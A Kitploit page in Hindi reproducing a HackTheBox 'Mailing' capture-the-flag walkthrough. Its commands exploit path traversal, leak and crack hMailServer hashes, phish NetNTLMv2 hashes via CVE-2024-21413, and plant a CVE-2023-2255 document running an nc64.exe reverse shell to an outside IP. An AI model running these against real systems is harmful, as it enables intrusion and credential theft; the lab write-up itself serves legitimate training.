Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
HTB-Mailing-A-Complete-Walkthrough — अगर आप HackTheBox मशीनों पर कड़ी मेहनत कर रहे हैं, तो Mailing उन बॉक्सों में से एक है जो वास्तव में आपको कुछ सिखाता है। इसे Easy रेटेड किया गया है, यह Windows पर चलता है, और कुछ वास्तविक दुनिया की कमजोरियों को एक साथ जोड़ता है — एक directory traversal, एक credential leak, CVE-2024-21413, और एक LibreOffice macro exploit। आइए इसे चरण दर चरण देखें। | Kitploit
उपकरण/GitHubGitHub/themursalin/htb-mailing-a-complete-walkthrough
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणपार्श्व आंदोलनफिशिंगवेब सुरक्षाCTF

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

अगर आप HackTheBox मशीनों पर कड़ी मेहनत कर रहे हैं, तो Mailing उन बॉक्सों में से एक है जो वास्तव में आपको कुछ सिखाता है। इसे Easy रेटेड किया गया है, यह Windows पर चलता है, और कुछ वास्तविक दुनिया की कमजोरियों को एक साथ जोड़ता है — एक directory traversal, एक credential leak, CVE-2024-21413, और एक LibreOffice macro exploit। आइए इसे चरण दर चरण देखें।

पेनिट्रेशन टेस्टिंग
लर्निंग और शिक्षा
GitHubthemursalin/htb-mailing-a-complete-walkthrough

HTB-Mailing-A-Complete-Walkthrough

रिपॉजिटरी देखें
55 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

HTB: Mailing — एक संपूर्ण वॉकथ्रू

द्वारा: मुर्सलिन


यदि आप HackTheBox मशीनों पर काम कर रहे हैं, तो Mailing उन बक्सों में से एक है जो वास्तव में आपको कुछ सिखाता है। इसे Easy रेटेड किया गया है, यह Windows पर चलता है, और कुछ वास्तविक दुनिया की कमजोरियों को एक साथ जोड़ता है — एक डायरेक्टरी ट्रैवर्सल, एक क्रेडेंशियल लीक, CVE-2024-21413, और एक LibreOffice मैक्रो एक्सप्लॉइट। आइए इसे चरण दर चरण देखें।


रिकॉनिसेंस

हमेशा की तरह, हम यह देखने के लिए nmap स्कैन से शुरू करते हैं कि हम क्या सामना कर रहे हैं:

root@kitploit:~
nmap -p- --min-rate 10000 10.10.11.14
nmap -p [ports] -sCV 10.10.11.14

परिणाम काफी कुछ खुले पोर्ट दिखाते हैं। मुख्य बिंदु:

  • पोर्ट 80 — HTTP (mailing.htb पर रीडायरेक्ट करता है)
  • पोर्ट 25, 465, 587 — SMTP
  • पोर्ट 110, 993 — POP3 / IMAP (hMailServer द्वारा संचालित)
  • पोर्ट 445 — SMB
  • पोर्ट 5985 — WinRM (दिलचस्प यदि हम कभी क्रेडेंशियल प्राप्त कर लें)

OS फिंगरप्रिंट Windows 10 या Server 2019 से मेल खाता है, और IIS संस्करण पुष्टि करता है कि यह कम से कम IIS 10 है। मैं यह भी नोट करता हूँ कि SMB मैसेज साइनिंग सक्षम है लेकिन आवश्यक नहीं है — बाद में उपयोग के लिए याद रखें।

मेल पोर्ट हर जगह हैं, लेकिन उन्हें शायद क्रेडेंशियल की आवश्यकता होगी। पोर्ट 80 पर वेबसर्वर स्पष्ट शुरुआती बिंदु है।


वेब एन्यूमरेशन

/etc/hosts में mailing.htb जोड़ने के बाद, साइट एक मेल होस्टिंग कंपनी की तरह दिखती है जो hMailServer पर बनी है। सतह पर कुछ भी फैंसी नहीं — एक "अबाउट" सेक्शन, तीन नामों वाली एक टीम (Ruy Alonso, Maya Bendito, Gregory Smith), और एक "डाउनलोड इंस्ट्रक्शंस" बटन।

डाउनलोड बटन निम्नलिखित ओर इशारा करता है:

root@kitploit:~
http://mailing.htb/download.php?file=instructions.pdf

वह file= पैरामीटर तुरंत संदिग्ध है। आइए इसका परीक्षण करें।

मैंने सबडोमेन की जाँच के लिए ffuf चलाया — कुछ दिलचस्प नहीं मिला। फिर डायरेक्टरी ब्रूट फोर्सिंग के लिए feroxbuster भी चलाया, download.php के अलावा कुछ भी नया नहीं। इसलिए हमारा सारा ध्यान उस एक एंडपॉइंट पर जाता है।


डायरेक्टरी ट्रैवर्सल → फ़ाइल रीड

पथ ट्रैवर्सल के लिए file पैरामीटर का परीक्षण:

root@kitploit:~
curl http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts

और यह काम करता है — हमें Windows hosts फ़ाइल वापस मिलती है। ऐप सचमुच हम जो कुछ भी देते हैं उसके आगे बेस पथ जोड़ रहा है और file_get_contents() कॉल कर रहा है। कोई सैनिटाइज़ेशन नहीं, कोई जेल नहीं। download.php का स्रोत जब हम इसे सीधे पढ़ते हैं तो इसकी पुष्टि करता है:

root@kitploit:~
$file_path = 'C:/wwwroot/instructions/' . $file;
if (file_exists($file_path)) {
    echo file_get_contents($file_path);
}

अब हमारे पास एक Windows मशीन पर मनमाना फ़ाइल रीड है। आइए इसका उपयोग करें।


hMailServer एडमिन हैश लीक करना

hMailServer अपनी कॉन्फ़िगरेशन hMailServer.ini में संग्रहीत करता है। कुछ शोध के बाद, फ़ाइल यहाँ रहती है:

root@kitploit:~
C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini

हमारे ट्रैवर्सल के माध्यम से इसे पढ़ना:

root@kitploit:~
curl 'http://mailing.htb/download.php?file=../../Program+Files+(x86)/hMailServer/bin/hMailServer.ini'

आउटपुट में शामिल है:

root@kitploit:~
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

[Database]
Password=0a9f8ad8bf896b501dde74f08efd7e4c

दो MD5 हैश। मैं उन्हें CrackStation में डालता हूँ:

  • 841bb5acfa6779ae432fd7a4e6600ba7 → homenetworkingadministrator
  • दूसरा → नहीं मिला

तो हमारे पास hMailServer के लिए एडमिनिस्ट्रेटर पासवर्ड है। इसे Windows उपयोगकर्ता administrator के रूप में SMB के विरुद्ध आज़माने पर यह विफल होता है — यह स्थानीय खाता पासवर्ड नहीं है, बस मेल सेवा का एडमिन पासवर्ड है। लेकिन यह SMTP सेवा में प्रमाणीकरण के लिए काम करता है, जो कि हमें चाहिए।


CVE-2024-21413 — Maya को विंडोज मेल के माध्यम से फिशिंग

अब हमें एक वास्तविक उपयोगकर्ता के रूप में पैर जमाने की आवश्यकता है। साइट उल्लेख करती है कि उपयोग किया जाने वाला मेल क्लाइंट Windows Mail है (इंस्टॉलेशन निर्देश PDF के आधार पर)। ज्ञात कमजोरियों की जाँच करने का समय।

CVE-2024-21413 Microsoft Outlook और Windows Mail में एक रिमोट कोड एक्सीक्यूशन कमजोरी है। दोष इस बात में निहित है कि क्लाइंट ईमेल बॉडी में file:// प्रोटोकॉल URL को कैसे संभालते हैं। सामान्यतः, विभिन्न प्रोटोकॉल पर सुरक्षा प्रतिबंध लगाए जाते हैं। हालाँकि, शोधकर्ताओं ने पाया कि यदि URL !anything के साथ समाप्त होता है, तो वे प्रतिबंध चुपचाप हटा दिए जाते हैं। जब कोई उपयोगकर्ता ऐसे लिंक वाले ईमेल को खोलता है या पूर्वावलोकन भी करता है, तो क्लाइंट स्वचालित रूप से हमलावर के SMB सर्वर पर प्रमाणित करने का प्रयास करता है — NetNTLMv2 हैश सौंप देता है।

GitHub पर xaitax द्वारा एक ठोस PoC है। मैं इसे क्लोन करता हूँ और इसे इन पैरामीटरों के साथ चलाता हूँ:

root@kitploit:~
python CVE-2024-21413.py \
  --server mailing.htb \
  --port 587 \
  --username [email protected] \
  --password homenetworkingadministrator \
  --sender [email protected] \
  --recipient [email protected] \
  --url "\\10.10.14.6\share\sploit" \
  --subject "Check this out ASAP!"

ईमेल सफलतापूर्वक भेजा जाता है। इस बीच, मेरे अटैक मशीन पर Responder चल रहा है ताकि आने वाले प्रमाणीकरण को पकड़ सकूँ:

root@kitploit:~
sudo /opt/Responder/Responder.py -I tun0

लगभग एक मिनट बाद, Maya का क्लाइंट ईमेल खोलता है और Responder उसका NetNTLMv2 हैश कैप्चर करता है। मैं इसे hashcat से क्रैक करता हूँ:

root@kitploit:~
hashcat -m 5600 maya_hash.txt /usr/share/wordlists/rockyou.txt

पासवर्ड क्रैक: m4y4ngs4ri


Maya के रूप में शेल

Maya के क्रेडेंशियल के साथ, मैं Evil-WinRM का उपयोग करके कनेक्ट करता हूँ:

root@kitploit:~
evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'

हम अंदर हैं। उपयोगकर्ता फ़्लैग Maya के डेस्कटॉप पर है।


प्रिविलेज एस्केलेशन — CVE-2023-2255 (LibreOffice)

अब रूट तक पहुँचने का रास्ता खोजने का समय है। सिस्टम में इधर-उधर देखने पर, Important Documents नामक एक शेयर मिलता है और LibreOffice स्थापित है। यह CVE-2023-2255 की ओर एक मजबूत संकेत है।

CVE-2023-2255 LibreOffice संस्करण 7.4.7 और 7.5.3 से पहले के संस्करणों को प्रभावित करता है। यह "फ्लोटिंग फ्रेम्स" का दुरुपयोग करता है — .odt दस्तावेज़ों के अंदर लिंक की गई बाहरी फ़ाइलें। यह कमजोरी उन फ्रेमों को उपयोगकर्ता से अनुमति मांगे बिना लोड करने का कारण बनती है, और सामग्री एक मैक्रो हो सकती है जो दस्तावेज़ लोड होने पर निष्पादित होती है।

elweth-sec द्वारा PoC एक दुर्भावनापूर्ण .odt उत्पन्न करता है जो एक शेल कमांड एम्बेड करता है। दस्तावेज़ संरचना content.xml में एक <script> टैग एम्बेड करती है जो LibreOffice द्वारा फ़ाइल खोलने पर फायर होता है।

मैं एक रिवर्स शेल पेलोड उत्पन्न करता हूँ:

root@kitploit:~
python /opt/CVE-2023-2255/CVE-2023-2255.py \
  --cmd 'cmd.exe /c C:\ProgramData\nc64.exe -e cmd.exe 10.10.14.6 443' \
  --output exploit.odt

फिर Maya के क्रेडेंशियल का उपयोग करके .odt फ़ाइल और nc64.exe दोनों को Important Documents SMB शेयर पर अपलोड करता हूँ:

root@kitploit:~
smbclient '//10.10.11.14/important documents' --user maya --password m4y4ngs4ri
smb: \> put exploit.odt
smb: \> put nc64.exe

Maya के WinRM शेल से, मैं nc64.exe को C:\ProgramData में कॉपी करता हूँ ताकि मैक्रो इसे ढूँढ सके:

root@kitploit:~
copy "\Important Documents\nc64.exe" nc64.exe

एक या दो मिनट बाद, बॉक्स पर कुछ दस्तावेज़ खोलता है (संभवतः एक स्वचालित शेड्यूल्ड टास्क), और मैं अपने netcat लिसनर पर एक शेल प्राप्त करता हूँ:

root@kitploit:~
rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.14
Microsoft Windows [Version 10.0.19045.4355]

C:\Program Files\LibreOffice\program> whoami
mailing\localadmin

हम localadmin के रूप में चल रहे हैं — और रूट फ़्लैग डेस्कटॉप पर है।


बोनस: अनइंटेंडेड पथ (पूर्व-पैच)

बॉक्स को 15 मई, 2024 को पैच किया गया था — रिलीज़ के केवल 11 दिन बाद — क्योंकि मूल download.php ने file_get_contents() के बजाय PHP के include() का उपयोग किया था। इसने एक साधारण फ़ाइल रीड को पूर्ण लोकल फ़ाइल इनक्लूज़न (LFI) कमजोरी में बदल दिया, जिसका अर्थ है कि किसी पढ़ने योग्य फ़ाइल में कोई भी PHP कोड निष्पादित हो जाएगा।

अनइंटेंडेड पथ hMailServer के SMTP लॉग्स को पॉइज़न करना था (telnet के माध्यम से कनेक्ट करके HELO कमांड में PHP इंजेक्ट करके), फिर LFI के माध्यम से उस लॉग फ़ाइल को शामिल करके defaultapppool के रूप में कोड एक्सीक्यूशन प्राप्त करना। वहाँ से, SeImpersonatePrivilege + GodPotato = SYSTEM। रूट तक पहुँचने का एक पूरी तरह से अलग मार्ग।


सारांश

Mailing पर अटैक चेन इस प्रकार है:

  1. download.php में डायरेक्टरी ट्रैवर्सल के माध्यम से फ़ाइल रीड
  2. hMailServer.ini से क्रेडेंशियल लीक → MD5 एडमिन हैश क्रैक करना
  3. CVE-2024-21413 → Maya को फिश करना, उसका NetNTLMv2 हैश कैप्चर और क्रैक करना
  4. क्रैक किए गए क्रेडेंशियल का उपयोग करके Maya के रूप में WinRM शेल
  5. CVE-2023-2255 → एक देखे गए शेयर पर दुर्भावनापूर्ण LibreOffice दस्तावेज़ छोड़ना → localadmin के रूप में शेल

यह बॉक्स वास्तविक CVEs को एक साथ इस तरह से जोड़ने का एक बेहतरीन काम करता है जो विश्वसनीय लगता है। शोषण के चरण अत्यधिक जटिल नहीं हैं, लेकिन आपको प्रत्येक चरण में समझने की आवश्यकता है कि आप क्या कर रहे हैं। निश्चित रूप से एक ऐसा बॉक्स जो OSCP की तैयारी कर रहे हैं तो पुनरावलोकन के लायक है।


पढ़ने के लिए धन्यवाद! अधिक HTB राइटअप और CTF सामग्री के लिए मुझे Medium पर फॉलो करें।

— मुर्सलिन

टूल डाउनलोड करें